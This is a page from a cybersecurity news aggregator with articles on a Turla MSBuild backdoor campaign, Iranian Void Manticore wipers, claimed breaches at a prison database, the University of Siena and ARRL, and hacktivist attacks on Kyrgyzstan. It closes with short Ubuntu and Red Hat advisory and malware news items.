Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Turla APT Group Susp ...

 Firewall Daily

Cyble Research and Intelligence Labs (CRIL) has discovered a sophisticated cyber campaign employing malicious LNK files, potentially distributed through spam emails. This intricate operation, possibly orchestrated by the notorious Turla Advanced Persistent Threat (APT) group, employs human rights seminar invitations   show more ...

and public advisories as bait to infiltrate users' systems with a nefarious payload. The threat actors (TAs) showcase a high level of sophistication by embedding lure PDFs and MSBuild project files within the .LNK files, ensuring a seamless execution process. Leveraging the Microsoft Build Engine (MSBuild), the TA executes these project files to deploy a stealthy, fileless final payload, acting as a backdoor to facilitate remote control over the compromised system. Turla APT Group Infection Chain [caption id="attachment_69293" align="alignnone" width="1024"] Source: Cyble[/caption] The attack unfolds with a malicious .LNK file concealed within a ZIP archive, potentially delivered via phishing emails. Upon execution, the .LNK file triggers a PowerShell script, initiating a sequence of operations. These operations include extracting content from the .LNK file and creating three distinct files in the %temp% location: a lure PDF, encrypted data, and a custom MSBuild project. [caption id="attachment_69295" align="alignnone" width="1024"] Source: Cyble[/caption] The disguised .LNK file triggers a PowerShell script, which then opens the lure PDF while silently executing the embedded MSBuild project. [caption id="attachment_69299" align="alignnone" width="783"] Source: Cyble[/caption] This project file, containing encrypted content, employs the Rijndael algorithm to decrypt data, subsequently executing a final backdoor payload. [caption id="attachment_69296" align="alignnone" width="1119"] Source: Cyble[/caption] The decrypted MSBuild project file, when executed using MSBuild.exe, runs an inline task directly in memory. This task enables the backdoor to initiate various operations, including monitoring processes, executing commands, and communicating with a Command and Control (C&C) server for further instructions. Threat Actor Attribution to Turla APT Group According to CRIL, the threat actor behind this campaign is the Turla APT group due to Russian-language comments in the code and behavioral similarities with previous Turla campaigns. The group's focus on targeting NGOs aligns with the lure documents referencing human rights seminars. The utilization of MSBuild and other legitimate applications highlights the persistent nature of the threat actor. By exploiting inherent functionalities, the Turla APT group can evade conventional security measures. Organizations must adopt a multi-layered security approach to mitigate risks effectively. To fortify defenses against sophisticated threats like the Turla APT group, organizations should adopt key cybersecurity measures. This includes implementing robust email filtering to block malicious attachments and exercising caution when handling email attachments from unknown sources.  Limiting access to development tools such as MSBuild to authorized personnel helps prevent misuse while disabling unnecessary scripting languages like PowerShell reduces the risk of exploitation. Establishing network-level monitoring is crucial for detecting and responding to anomalous activities swiftly. These practices collectively enhance security posture, safeguarding sensitive data and systems from cyber threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Void Manticore: Iran ...

 Cyber Warfare

An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) is using destructive data wiping attacks combined with influence operations to target Israel and Albania. Tracked as Void Manticore, aka Storm-842, the threat actor operates under multiple online personas in which the primary   show more ...

alias includes “Homeland Justice” for attacks in Albania and "Karma" for those in Israel. Since October 2023, Check Point Research monitored Void Manticore's activities targeting Israeli organizations with destructive attacks using wipers and ransomware. The group employs five different methods for disruptive operations, including custom wipers for both Windows and Linux operating systems, as well as manual deletion of files and shared drives. Void Manticore’s activities in Israel are marked by the use of a custom wiper named “BiBi,” after Israeli Prime Minister Benjamin Netanyahu. The group also uses a persona named "Karma" to leak stolen information, portraying themselves as an anti-Zionist Jewish group. This persona gained prominence during the Israel-Hamas conflict in late 2023. Void Manticore threat actor employs relatively simple and direct techniques, often using basic publicly available tools. Their operations typically involve lateral movements using Remote Desktop Protocol (RDP) and the manual deployment of wipers. One of their prominent tools is “Karma Shell,” a homebrewed web shell disguised as an error page. This malicious shell is capable of directory listing, process creation, file uploads, and service management. The Destructive Wiper Capabilities of Void Manticore Void Manticore utilizes various custom wipers in their attacks: Cl Wiper: First used in attacks against Albania, this wiper uses the ElRawDisk driver to interact with files and partitions, effectively erasing data by overwriting physical drives with predefined buffers. Partition Wipers: These wipers remove partition information, leading to the loss of all data on the disk by corrupting the partition table, resulting in a system crash during reboot. BiBi Wiper: Deployed in recent attacks against Israel, this wiper exists in both Linux and Windows variants. It corrupts files and renames them with specific extensions, causing significant data loss. Apart from automated wipers, Void Manticore engages in manual data destruction using tools like Windows Explorer, SysInternals SDelete and the Windows Format utility, furthering their impact on targeted systems. Psychological Warfare and Collaboration with Scarred Manticore Void Manticore’s strategy also includes psychological operations, aiming to demoralize and disrupt their targets by publicly leaking sensitive information. This dual approach amplifies the impact of their cyberattacks, making them a formidable threat. Notably, there is a significant overlap and cooperation between Void Manticore and another Iranian threat group, Scarred Manticore (aka Storm-861). Analysis shows a systematic handoff of victims between these two groups. For instance, Scarred Manticore might establish initial access and exfiltrate data after which Void Manticore executes the destructive data wiping attack. This collaboration enables Void Manticore threat actor to leverage Scarred Manticore’s advanced capabilities and gain access to high-value targets. “In the case of one victim, we discovered that after residing on the targeted network for over a year, Scarred Manticore was interacting with the infected machine at the exact moment a new web shell was dropped to disk. Following the shell’s deployment, a different set of IPs began accessing the network, suggesting the involvement of another actor – Void Manticore,” the researchers said. “The newly deployed web shell and subsequent tools were significantly less sophisticated than those in Scarred Manticore’s arsenal. However, they led to the deployment of the BiBi wiper, which is linked to Karma’s activity.” Void Manticore represents a significant cyber threat, particularly in the context of geopolitical tensions involving Iran. Iranian President Ebrahim Raisi died in a helicopter crash in a remote area of the country. Rescuers identified Raisi's body early Monday after searching in the mountainous northwest near the Azerbaijan border. Since his election in 2021, Raisi had tightened morality laws, cracked down on antigovernment protests and resisted international oversight of Tehran’s nuclear program. Israel’s war in Gaza has escalated conflicts with Iran-backed groups like Hezbollah in Lebanon and the Houthis in Yemen. Last month, Iran and Israel exchanged direct strikes. It is still unclear whether Raisi’s death is also linked to Israeli operations. Meanwhile, the recent escalations meant that Void Manticore’s coordinated operations with Scarred Manticore, combines their dual approach of technical destruction and psychological manipulation and positions them as a highly dangerous actor. Their activities not only target infrastructure but also aim to influence public perception and political stability, underlining the multifaceted nature of modern cyber warfare. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Threat Actors USDoD ...

 Cybersecurity News

Threat actors USDoD and SXUL have claimed responsibility for an alleged major prison data breach  compromising of approximately 70 million rows of sensitive data linked to a criminal database, on LeakBase. While no further details were shared about the specific prison(s) involved, the threat actor shared sample data   show more ...

allegedly stemming from the claimed prison data breach. Prison Data Breach Allegedly Includes Wide Array of Data The prison data leak reportedly includes unique identification numbers, Social Security Numbers, full names, dates of birth, birth states, physical features, Home and alternate addresses, offense codes, offense dates, offense descriptions, court dispositions, conviction dates and dates of charges. The data had been shared in .csv format and is stated at being 3GB in file size when compressed and 22GB while uncompressed. This data is stated to consist of data from the year 2020 to 2024 and the sample data purporting to be details of at least three convicted individuals were shared. [caption id="attachment_69318" align="alignnone" width="1359"] Source: X.com (@DarkWebInformer)[/caption] While this marks the first time the threat actor USDoD has posted on LeakBase, the threat actor claimed they would use it only until they got their own forum active. USDoD had earlier announced the creation of a new leak forum, choosing to name it 'Breach Nation'. While the details of the attack and their alleged involvement is unknown, USDoD credited the threat actor SXUL for the prison data breach. In a later reply to the thread, he clarified that the breach stemmed from the United States. USDoD Known to Target Government Related Data The threat actor has frequently targeted government, defense/law-enforcement contractors and geo-political entities, with most of his operations primarily focused on the United States as noticed during the #RaidAgainstTheUS campaign. The incidents under the two-day release campaign in February 2022 included a a US Strategic Command database, US Defense Technical Information Center database, an Army Special Operations Center of Excellence database, a US Central Command database, a U.S. Special Operations Command database, and a Lockheed Martin database. While believed to harbor Pro-Russian ties or sympathies, he has denied any involvements with governments or political entities. This denial included a statement of him claiming he had refused an offer to sell compromised intel to the Iranian government after being approached by them. Interestingly, the threat actor maintained Russia as among the nations he would refuse to target along with Iran. USDoD is known to rely on social engineering techniques to break into high-profile agencies or entities, and his previous attacks have included the FBI's private partner InfraGard, leak of Airbus data on the 22nd anniversary of the 9/11 attacks, NATO Cyber Center Defense, and CEPOL. USDoD has disclosed that the use of tools such as Zoominfo to identify and research targets as well as their importance within  the military and defense sector. Within the the Airbus post, the threat actor also threatened attacks on Lockheed martin, Raytheon and other entire defense contractors. Recently, the actor claimed attacks on entities such as the unconfirmed Chinese Communist Party data leak and the Bureau Van Dijk(which has since then been refuted), since then the threat actor seems to be working on setting up their own content delivery network to host leak files as well as their own data leak forum. While the prison data breach remains unconfirmed, the threat actor's previous involvement in high-profile social engineering attacks remains a cause of concern for future operations and claims along with potential consequences stemming from the alleged prison member data leak. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for University of Siena ...

 Cybersecurity News

The University of Siena, a distinguished Italian academic institution established in 1240, is currently grappling with a significant cybersecurity incident. The LockBit 3.0 ransomware group has claimed responsibility for the attack that has disrupted multiple university services, leading to the temporary suspension of   show more ...

its systems. As one of Europe's oldest universities, Siena offers extensive programs in sciences, medicine, engineering, economics, and social sciences. In response to the crisis, the university has initiated recovery operations with the support of the Italian National Cybersecurity Agency (Agenzia per la Cybersicurezza Nazionale), although the involvement of LockBit has not yet been officially confirmed. University of Siena Data Breach and Ransom Demand According to the new LockBit 3.0 leak site, the group has allegedly exfiltrated 514 GB of sensitive data from the university's systems. Screenshots of the stolen data were shared on both the leak site as well as the group's Telegram channel. The stolen data reportedly includes: Financial Documents including : Budgets detailing expenses by month from 2020 to 2024. Board-approved documents regarding project and tender financing from 2022 to 2026, including funding amounts. Documents related to extraordinary construction works, contractor appointments, and a €1.7 million budget allocation. Confidential Information including: Non-disclosure agreements for the upcoming WineCraft 2024 event. Tender design contracts for 2023, including contract budgets.  Contractor's investment plan for 2022, encompassing expenses, rents, and the overall financial plan. [caption id="attachment_69276" align="alignnone" width="803"] Source: LockBit leak site[/caption] [caption id="attachment_69277" align="alignnone" width="323"] Source: LockBit Telegram[/caption] With a looming ransom deadline set for May 28, the university is racing against limited time to deal with the consequences of the digital assault. Earlier on May 10th, the University of Siena acknowledged the cyber attack on its website, informing the public about the suspension of various of its services due to a 'massive cyber attack by an international group of hackers.' University's Response and Restoration Efforts The website acknowledged that several of its services including its website for international admissions, ticketing services, and payment management platforms had been affected and were taken down as a preventative measure. The notice assured users that payments made prior to the attack had been registered despite a temporary disconnect between the website's payment confirmation and application processing. [caption id="attachment_69271" align="alignnone" width="2800"] Source: www.apply.unisi.it[/caption] However, the notice also stated that the volume of assistance requests being received from international candidates following the incident was found to be overwhelming to its staff. The notice advised students to refrain from sending multiple inquiries, promising to respond as soon as possible. The notice provided separate advice to both candidates who had already paid university fees but did not submit applications and candidates who submitted admission applications but had not yet paid their application fees. The site stated in bold that students who fall in the above mentioned categories should avoid unnecessary contact with staff, while apologizing for the inconvenience caused by the issue. The attack on the University of Siena is one of the largest attacks claimed by the LockBit group following the recent disruption to its activities after its coordinated takedown by law enforcement groups. The incident underscores the group's persistent efforts to remain active in their efforts despite these operational challenges, while emphasizing their ability to still cause massive disruption to victims. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Kyrgyzstan Unrest Es ...

 Firewall Daily

Bishkek, the capital of Kyrgyzstan, is currently reeling under severe mob violence and escalating cyberattacks on Kyrgyzstan, marking a turbulent period for the nation. The recent upheaval, primarily targeting foreign students, has drawn significant international attention and diplomatic concerns, particularly from   show more ...

India and Pakistan. The Catalyst for Chaos The unrest began on the night of May 17-18, following a viral video allegedly depicting a fight between Kyrgyz and Egyptian medical students on May 13. The video, which rapidly spread across social media, purportedly showed Kyrgyz students in conflict with Egyptian students. This incident triggered widespread mob violence, with locals directing their aggression towards foreign students, exacerbating tensions in Bishkek. Despite the lack of verified evidence that the individuals involved were Kyrgyz youths, the video sparked significant social unrest. The ensuing chaos resulted in 28 injuries, including three foreigners, prompting riot police to intervene and cordon off areas where mobs had gathered. Footage circulating online showed mobs attacking foreign students in the streets and even within dormitories, creating an environment of fear and hostility for international students. Cyberattacks on Kyrgyzstan Compound the Crisis Amidst the physical violence, Kyrgyzstan's digital infrastructure is under severe attack from various hacktivist groups. These coordinated cyberattacks on Kyrgyzstan have targeted critical governmental and private sector systems, exacerbating the already volatile situation. Several hacktivist groups are involved in these cyber assaults: Team Insane PK has allegedly attacked the Ministry of Agriculture, the Education Portal of the Ministry of Emergency Situations, Saima Telecom, the Climate Monitoring Platform (http://climatehub.kg), and multiple universities including Osh State University and Kyrgyz State Medical Academy. Silent Cyber Force, another Pakistan-based group, has also allegedly targeted Kyrgyzstan’s Ministry of Defence and Ministry of Agriculture. [caption id="attachment_69159" align="aligncenter" width="881"] Source: X[/caption] [caption id="attachment_69158" align="aligncenter" width="922"] Source: X[/caption] Golden Don’s has allegedly launched cyberattacks on the Ministry of Economy and Commerce, the Kyrgyzstan Visa Website, and Kyrgyzstan Turkish Manas University. Anon Sec BD from Bangladesh has allegedly attacked MBank and Finca Bank. An individual hacktivist known as 'rajib' allegedly targeted Kyrgyzstan’s railway’s official portal. Sylhet Gang has allegedly disrupted the Kyrgyz Ministry of Foreign Affairs and the Kyrgyz telecommunication network Nur, causing significant outages. Furthermore, there are claims that the Mysterious Team Bangladesh is planning future cyberattacks on Kyrgyzstan. [caption id="attachment_69160" align="aligncenter" width="868"] Source: X[/caption] One of the hacktivist groups, Silent Cyber Force, posted a message titled "Greetings Citizens Of The World," condemning the violence against foreign students and declaring their intention to take down Kyrgyzstan's governmental websites and large networks. Their message explicitly mentioned targeting various international adversaries but stated that the current focus is on Kyrgyzstan due to the perceived inaction of its government in protecting foreign students. [caption id="attachment_69155" align="aligncenter" width="788"] Source: X[/caption] Despite these threats, the official websites of the targeted institutions appeared to be functioning normally when accessed. This raises questions about the hackers' actual capabilities or possible tactical delays in executing their threats. The full extent and impact of these cyberattacks on Kyrgyzstan will become clearer once official statements are released. The Implications and the Need for Vigilance The combination of physical violence and digital attacks underlines the critical need for enhanced security measures in both physical and cyber domains. These cyber-threats not only disrupt governmental operations but also pose significant risks to essential services that affect both citizens and foreign nationals in Kyrgyzstan. The current situation in Kyrgyzstan highlights the vulnerability of digital infrastructure during periods of social unrest. Hacktivist groups are leveraging the chaos to further their agendas, targeting key institutions and spreading fear and disruption. The ongoing cyberattacks on Kyrgyzstan demonstrate the importance of cyber threat intelligence and the need for comprehensive cybersecurity strategies to protect national infrastructure. In response to these developments, it is imperative for Kyrgyzstan to strengthen its cybersecurity defenses and enhance its physical security measures to safeguard all residents, including foreign students. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Threat Actor Chucky, ...

 Firewall Daily

The threat actor and the owner of the English language cybercrime forum LeakBase, Chucky, has leaked a database allegedly stolen from the the Spanish IT services company Knowmad Mood. The Knowmad Mood data breach reportedly contains sensitive employee data. Knowmad Mood who recently shifted it's name and branding   show more ...

from the earlier name atSistemas, had been established in 1994 and provides consulting and software development services, with offices present in Spain, Italy, Portugal, the United States, Morocco, the United Kingdom, and Uruguay. LeakBase is a data leak forum that gained popularity as an alternative source for sharing hacked data or leaked databases and credentials following the 2023 BreachForums takedown. Knowmad Mood Data Breach Stems from CRM System The stolen data was allegedly exported from the company's CRM system, and Chucky shared screenshots to further cement his responsibility for the Knowmad mood data breach. The screenshots appeared to reveal a cache of sensitive files, including HTML, Excel, and Word documents. [caption id="attachment_69238" align="alignnone" width="1447"] Source: LeakBase Forum[/caption] Further, a CSV file had been shared and was stated to contain workplace information and performance metrics of employees, including fields such as names, email addresses, h.input, h.exit, effective h., STE, STE Percentage, and h.STE. The leaked data raises serious concerns about the security measures in place at Knowmad mood, and the potential impact it may have on employees and customers. The Cyber Express team has reached out to Knowmad Mood for further information or updates on the alleged data breach claims; however, no updates were received at the time of writing. Earlier Activities of Threat Actor Chucky The threat actor Chucky, admin of LeakBase has previously operated under the names LeakBase, Sqlrip, and Chuckies on various underground forums. After the mid-March 2023 shutdown of BreachForums, the threat actor's own forum LeakBase started gaining traction among the cybercriminal community. Chucky had been a regular participant and contributor on BreachForums, sharing breached databases and selling admin/unauthorized access to websites while also being the top active poster on their own LeakBase leak forums. The threat actor had disclosed to Cyble researchers that their primary tactic involved a customized brute forcing technique. While the researchers confirmed that the technique might serve as a plausible method for the threat actor's data breach attacks, the full tactics, techniques, and procedures (TTPs) employed by the TA remained unconfirmed. Chucky previously claimed responsibility for massive leaks from sources such as the Indian government's Swachh City initiative, OnePlus-Oppo & Realme in a data breach attack affecting users from Thailand, Gamekaking and American automotive digital marketing service Purecars . Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Unverified Claims of ...

 Firewall Daily

The Just Evil/Killmilk hacker group has claimed the Hamburg Airport cyberattack, asserting access to certain parts of the airport's premises. The claim, posted in cryptic messages on social media platforms, suggests a breach of security protocols with detailed descriptions of airport locations and systems. The   show more ...

post, which includes snippets of code and references to specific areas within the airport, has raised concerns about the vulnerability of critical infrastructure to cyber threats. However, as of now, there has been no official confirmation or response from Hamburg Airport authorities regarding the alleged cyberattack. Unverified Hamburg Airport Cyberattack Claims [caption id="attachment_69180" align="alignnone" width="535"] Source: X[/caption] The Cyber Express reached out to the airport authorities for clarification on the alleged cyberattack on Hamburg Airport. However, at the time of writing this, no official statement of response has been received. This lack of response leaves the claims of a cyberattack on Hamburg Airport unverified at present. While the airport's website appears to be functioning normally, with no visible signs of disruption, the possibility of a targeted cyberattack on the backend systems cannot be ruled out. If indeed an attack occurred, it may have been limited in scope or duration, as indicated by similar attacks in the past.  Adding to the intrigue surrounding these claims is the background of the individual behind Just Evil/Killmilk. Identified as Nikolai Serafimov, a 30-year-old Russian citizen, he is purportedly the leader of the infamous hacktivist group Killnet. Serafimov's past involvement in criminal activities, including narcotics-related offenses and a stint in a Russian prison, adds a layer of complexity to the situation. Who is the Killnet Hacker Group? On August 1, 2022, "Killmilk" and its founder launched a cyber-attack on Lockheed Martin, citing retaliation for the U.S. supplying HIMARS systems to Ukraine. Accusing Lockheed Martin of sponsoring terrorism, the group targeted production systems and employee information. This marked a shift from their previous tactics of Distributed Denial-of-Service (DDoS) attacks.  Led by Serafimov, Killmilk had been involved in various cyber activities, including operating "Black Listing," a DDoS-for-pay platform. Serafimov introduced "Black Skills," a Private Military Hacking Company, indicating the increasing threat of cyber warfare by non-state actors.  The emergence of new tactics and entities like "Black Skills" highlights the new threat actor and its immovable plans for creating cyber conflict. This is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this story once we have more information on the alleged Hamburg Airport cyberattack or any official confirmation from the authorities.  Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Amateur Radio Group ...

 Firewall Daily

The amateur radio community, the American Radio Relay League (ARRL), the preeminent national association for amateur radio enthusiasts in the United States, has confirmed that it has been the target of a significant cyberattack. In an official statement, ARRL detailed the scope of cyberattack on ARRL. "We are in   show more ...

the process of responding to a serious incident involving access to our network and headquarters-based systems." This cyberattack on ARRL has affected multiple network systems and several of ARRL's vital online services. Cyberattack on ARRL: What is Affected? Foremost among the compromised services is the "Logbook of The World" (LoTW) internet database. This platform is crucial for amateur radio operators, allowing them to record and verify successful contacts (QSOs) with fellow operators globally. The LoTW's functionality as a digital logbook and a user confirmation system is central to the operations of many enthusiasts who rely on its integrity for maintaining accurate records. "Several services, such as Logbook of The World® and the ARRL Learning Center, are affected. Please know that restoring access is our highest priority, and we are expeditiously working with outside industry experts to address the issue. We appreciate your patience," the official statement read. The ARRL's importance to the amateur radio community cannot be overstated. As the national amateur radio organization, it provides crucial technical assistance, advocates for regulatory considerations, and organizes educational and networking opportunities for its members. The ARRL cyberattack thus has a broad impact, affecting not just the organization but the wider community of amateur radio operators who depend on ARRL’s services for their activities and growth. Reassurances on Data Security In a follow-up update, ARRL addressed growing concerns from its members about the potential compromise of personal information. Officials reassured members that no social security numbers or credit card information are stored on their systems. "Some members have asked whether their personal information has been compromised in some way. ARRL does not store credit card information anywhere on our systems, and we do not collect social security numbers. Our member database only contains publicly available information like name, address, and call sign along with ARRL-specific data like email preferences and membership dates," the update clarified. Despite these reassurances, the organization acknowledged that its member database includes sensitive information such as call signs and addresses. While email addresses are necessary for membership and are part of the stored data, it remains unclear to what extent this information might have been accessed or exploited in the cyberattack on American Radio Relay League. The exact nature of the cyber incident, whether it was a ransomware attack or another form of cybersecurity breach, has not been confirmed by ARRL. The situation remains dynamic, with ARRL collaborating with external cybersecurity experts to mitigate the impact and restore full functionality to their services. The response from the amateur radio community has been mixed, with many expressing support and patience, while others have voiced concerns over data security and the potential long-term effects on ARRL’s operations. This incident also serves as a reminder of the vulnerabilities inherent in digital transformation. As organizations increasingly rely on online platforms for critical services, enhanced cybersecurity measures become indispensable. The ARRL’s experience could prompt other associations and similar entities to re-evaluate their cybersecurity postures and adopt more stringent safeguards. For now, the amateur radio community remains in a state of cautious optimism. The expertise and dedication of ARRL’s team, combined with external support, provide hope that the affected services will be restored soon. The Cyber Express Team has reached out to ARRL for further comments and updates on the situation. However, as of now, no response has been received. As the story develops, the amateur radio community and cybersecurity experts alike await more detailed information on the nature and extent of the breach, and the steps being taken to safeguard against future incidents. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for UK’s AI Safety Ins ...

 Firewall Daily

In a move to enhance international cooperation on the regulation of Artificial Intelligence (AI), Britain's AI Safety Institute is set to establish a new office in the United States. The decision aims to reinforce collaboration in managing the rapid advancement of AI technology, signaling a proactive step toward   show more ...

addressing global concerns. Scheduled to open this summer in San Francisco, the new office will assemble a team of technical experts, complementing the institute's existing operations in London. By strengthening ties with its American counterparts, the institute seeks to facilitate knowledge exchange and harmonize regulatory efforts across borders. Britain's AI Safety Institute Opens in San Francisco, USA The urgency of regulating AI technology has been highlighted by experts who liken its potential threats to existential challenges such as nuclear weapons and climate change. Geoffrey Hinton, a prominent figure in AI development,  emphasized the pressing need for action, suggesting that AI may present a more immediate danger than climate change. Hinton's remarks highlight the complexities involved in managing AI risks, contrasting it with the relatively straightforward mitigation strategies for climate change. This highlights the importance of coordinated international efforts in shaping AI policies and safeguards. With AI Safety Institute’s presens in the US, the move aims to bolster international collaboration and solidify the Institute's role in AI safety. “The office is expected to open this summer, recruiting the first team of technical staff headed up by a Research Director. It will be a complementary branch of the Institute’s London HQ, which continues to grow from strength to strength and already boasts a team of over 30 technical staff”, denoted AI Safety Institute in a press release.  Simultaneously, the Institute released its first AI safety testing results and announced a partnership with Canada, emphasizing its commitment to global AI safety. These initiatives mark significant progress since the inaugural AI Safety Summit, highlighting the collaborative nature of multiple organizations for rigorous evaluation on artificial intelligence. Global Leaders Responds to Threat of Artificial Intelligence (AI) The announcement of the institute's expansion coincides with the upcoming global AI safety summit, jointly hosted by the British and South Korean governments. This collaborative platform aims to address emerging challenges and chart a course for responsible AI governance on a global scale. The initiative comes in the wake of growing concerns raised by technology leaders and experts regarding the unbridled development of powerful AI systems. Calls for a temporary halt in the advancement of AI technology have been echoed by various stakeholders, emphasizing the need for prudent and transparent regulatory frameworks. The inaugural AI safety summit held at Britain's Bletchley Park served as a motivation for constructive dialogue among world leaders, industry executives, and academics. Notable participants, including U.S. Vice President Kamala Harris and representatives from leading AI research institutions, engaged in discussions aimed at shaping ethical guidelines and policy frameworks for AI development and deployment. The collaborative spirit exhibited at the summit, exemplified by China's endorsement of the "Bletchley Declaration," highlights the importance of collective action in addressing AI-related challenges. By fostering inclusive dialogue and cooperation, stakeholders can mitigate the complexities of AI governance while maximizing its societal benefits. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

 Security Tips and Advice

The UK government has released guidance to help AI developers and vendors protect their AI models from hacking and potential sabotage, with the goal of transforming this guidance into a global standard to promote security by design in AI systems.

 Expert Blogs and Opinion

Adequate IAM policies are essential for incident management tooling to ensure the right people can quickly address issues without being blocked. Authentication verifies a person's identity, while authorization manages permissions and access levels.

 Malware and Vulnerabilities

The Grandoreiro banking Trojan has resurfaced with major updates, including enhanced functionality and the ability to target over 1500 global banking applications and websites in more than 60 countries, making it a more potent threat.

 Laws, Policy, Regulations

The White House unveiled a framework to protect U.S. workers from AI risks, emphasizing health and safety rights, governance, human oversight, and transparency as organizations adopt new technologies.

 Govt., Critical Infrastructure

Eric Goldstein, the executive assistant director for cybersecurity at the CISA, is leaving the agency in June after playing a crucial role in driving the agency's secure-by-design initiatives and strengthening partnerships with the private sector.

 Incident Response, Learnings

Two Chinese nationals have been indicted for their alleged involvement in a multimillion-dollar "pig butchering" investment fraud scheme, where they laundered over $73 million through US financial institutions and cryptocurrency wallets.

 Trends, Reports, Analysis

The enterprise attack surface is rapidly expanding due to the convergence of IT and OT systems, leading to a large number of ICS assets being exposed to the public internet and creating new vulnerabilities that security teams struggle to manage.

 Laws, Policy, Regulations

The SEC has approved new regulations that require broker-dealers and investment firms to notify their clients within 30 days of detecting a data breach, in an effort to modernize and enhance the protection of consumers' financial data.

 Incident Response, Learnings

The judge said the plaintiffs did not show an "administratively feasible" way for the court to determine whether a particular individual is a class member without extensive and individualized fact-finding.

 Feed

Ubuntu Security Notice 6777-2 - Zheng Wang discovered that the Broadcom FullMAC WLAN driver in the Linux kernel contained a race condition during device removal, leading to a use- after-free vulnerability. A physically proximate attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

 Feed

Ubuntu Security Notice 6766-3 - It was discovered that the Open vSwitch implementation in the Linux kernel could overflow its stack during recursive action operations under certain conditions. A local attacker could use this to cause a denial of service. Sander Wiebing, Alvise de Faveri Tron, Herbert Bos, and   show more ...

Cristiano Giuffrida discovered that the Linux kernel mitigations for the initial Branch History Injection vulnerability were insufficient for Intel processors. A local attacker could potentially use this to expose sensitive information.

 Feed

Red Hat Security Advisory 2024-2912-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2911-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2910-03 - An update for nodejs is now available for Red Hat Enterprise Linux 9. Issues addressed include HTTP request smuggling, denial of service, and out of bounds read vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2907-03 - An update for the httpd:2.4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a denial of service vulnerability.

 Feed

Red Hat Security Advisory 2024-2906-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2905-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2904-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Red Hat Security Advisory 2024-2903-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

 Feed

Cybersecurity researchers have observed a spike in email phishing campaigns starting early March 2024 that delivers Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware. "These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI's ability to invoke msiexec.exe and install a remotely-hosted MSI

 Feed

Multiple threat actors are weaponizing a design flaw in Foxit PDF Reader to deliver a variety of malware such as Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. "This exploit triggers security warnings that could deceive unsuspecting users into executing harmful commands," Check Point said in a technical report. "This exploit has been used by multiple

 Feed

All developers want to create secure and dependable software. They should feel proud to release their code with the full confidence they did not introduce any weaknesses or anti-patterns into their applications. Unfortunately, developers are not writing their own code for the most part these days. 96% of all software contains some open-source components, and open-source components make

 Feed

A "multi-faceted campaign" has been observed abusing legitimate services like GitHub and FileZilla to deliver an array of stealer malware and banking trojans such as Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo by impersonating credible software like 1Password, Bartender 5, and Pixelmator Pro. "The presence of multiple malware variants suggests a broad cross-platform targeting

 Feed

An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) has been attributed as behind destructive wiping attacks targeting Albania and Israel under the personas Homeland Justice and Karma, respectively. Cybersecurity firm Check Point is tracking the activity under the moniker Void Manticore, which is also known as Storm-0842 (formerly DEV-0842) by

 Cyber Security News

Source: thehackernews.com – Author: . May 20, 2024NewsroomCyber Attack / Malware Cybersecurity researchers have observed a spike in email phishing campaigns starting early March 2024 that delivers Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware. “These   show more ...

campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize […] La entrada Latrodectus Malware Loader Emerges as IcedID’s Successor in Phishing Campaigns – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

